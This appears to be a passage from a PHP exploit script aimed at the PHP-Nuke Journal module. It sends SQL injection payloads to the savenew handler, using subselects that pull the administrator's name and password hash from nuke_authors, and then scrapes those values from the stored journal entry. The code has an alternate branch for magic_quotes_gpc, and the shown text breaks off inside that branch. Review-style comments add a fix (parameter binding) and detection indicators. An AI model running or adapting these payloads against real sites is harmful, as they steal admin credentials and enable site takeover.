//Builds the POST body submitted to the Journal "savenew" handler. All three
//free-text fields carry SQL metacharacters: title ends in a backslash,
//bodytext is a bare "/*" comment opener, and mood (URL-encoded) begins with a
//quote and "*/" and then supplies extra column values, two of which are
//subselects reading aid and pwd from nuke_authors.
//NOTE(review): this can only have an effect if the server-side handler builds
//its SQL statement by concatenating these fields - the handler is not visible
//here, confirm against its source. Binding title/bodytext/mood as query
//parameters instead of interpolating them removes the issue.
//1337+30000 is left for the database to evaluate (31337); the script later
//searches the rendered journal entry for the string "31337".
//Detection: requests to modules.php?name=Journal&file=savenew whose body
//mentions nuke_authors or carries "/*" / "-- " in these fields are a strong
//indicator; stored journal entries containing 31337 next to an admin name
//suggest the pwd hashes in nuke_authors should be treated as exposed.
$http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
//Submits the body above; the returned value is tested immediately afterwards
//for "javascript:history.go(-1)" (presumably the page the module renders when
//it rejects the entry - verify against the target's templates).
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
//This part of the exploit is a bit strange; sorry for the mess, gotta release!
if(strstr($response,"javascript:history.go(-1)")){
//magic_quotes_gpc=on
$http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
if(strpos($response,"31337")){
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}else{
//magic_quotes_gpc=off
sleep(3);